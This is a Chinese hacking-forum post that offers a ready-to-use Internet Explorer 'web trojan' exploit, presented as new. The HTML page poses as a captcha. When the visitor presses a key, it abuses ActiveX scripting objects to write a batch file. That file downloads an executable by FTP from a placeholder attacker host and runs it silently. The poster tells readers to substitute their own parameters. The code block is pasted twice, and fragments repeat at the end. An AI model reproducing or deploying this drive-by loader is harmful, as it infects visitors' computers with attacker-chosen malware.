2006-05-15 11:35:15 by: h4x0r
Internet Explorer ActiveX Installation 利用程序
可以说是新的网马吧。
利用了ActiveX控件。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=716
利用了ActiveX控件。
<HTML>
<HEAD>
<TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<SCRIPT>
function doInstallControl() {
document.body.innerHTML +=
"<OBJECT id=wsh CLASSID=\"clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B\" TYPE=\"application/x-oleobject\" WIDTH=\"0\" HEIGHT=\"0\">\r\n" +
"</OBJECT>"+
"<OBJECT id=fso CLASSID=\"clsid:0D43FE01-F093-11CF-8940-00A0C9054228\" TYPE=\"application/x-oleobject\" WIDTH=\"0\" HEIGHT=\"0\">\r\n" +
"</OBJECT>";
a=document.getElementById("captcha");
a.value+="n";
a.focus();
var wsh=document.getElementById("wsh");
var fso=document.getElementById("fso");
var f=fso.CreateTextFile("c:\\a.bat");
s="ftp -n -s:a.bat\r\n"+
"open www.xxx.cn\r\n"+
"user UserNameHere\r\n"+
"Password_Here\r\n"+
"get The_exe_file.exe c:\\m.exe\r\n"+
"bye\r\n"+
"m.exe";
f.Write(s);
f.Close();
wsh.run("c:\\a.bat",0);
}
function doWaitEntry() {
if (event.keyCode == 78 || event.keyCode == 110) {
doInstallControl();
}
}
</SCRIPT>
<FORM ACTION="" METHOD="GET">
Please enter the text you see on the left:<BR><BR>
<B>onyy</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()" >
</FORM>
</BODY>
</HTML>
<HEAD>
<TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<SCRIPT>
function doInstallControl() {
document.body.innerHTML +=
"<OBJECT id=wsh CLASSID=\"clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B\" TYPE=\"application/x-oleobject\" WIDTH=\"0\" HEIGHT=\"0\">\r\n" +
"</OBJECT>"+
"<OBJECT id=fso CLASSID=\"clsid:0D43FE01-F093-11CF-8940-00A0C9054228\" TYPE=\"application/x-oleobject\" WIDTH=\"0\" HEIGHT=\"0\">\r\n" +
"</OBJECT>";
a=document.getElementById("captcha");
a.value+="n";
a.focus();
var wsh=document.getElementById("wsh");
var fso=document.getElementById("fso");
var f=fso.CreateTextFile("c:\\a.bat");
s="ftp -n -s:a.bat\r\n"+
"open www.xxx.cn\r\n"+
"user UserNameHere\r\n"+
"Password_Here\r\n"+
"get The_exe_file.exe c:\\m.exe\r\n"+
"bye\r\n"+
"m.exe";
f.Write(s);
f.Close();
wsh.run("c:\\a.bat",0);
}
function doWaitEntry() {
if (event.keyCode == 78 || event.keyCode == 110) {
doInstallControl();
}
}
</SCRIPT>
<FORM ACTION="" METHOD="GET">
Please enter the text you see on the left:<BR><BR>
<B>onyy</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()" >
</FORM>
</BODY>
</HTML>
s="ftp -n -s:a.bat\r\n"+
"open www.xxx.cn\r\n"+
"user UserNameHere\r\n"+
"Password_Here\r\n"+
"get The_exe_file.exe c:\\m.exe\r\n"+
自己改参数
"open www.xxx.cn\r\n"+
"user UserNameHere\r\n"+
"Password_Here\r\n"+
"get The_exe_file.exe c:\\m.exe\r\n"+
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=716
There is no comment on this article.
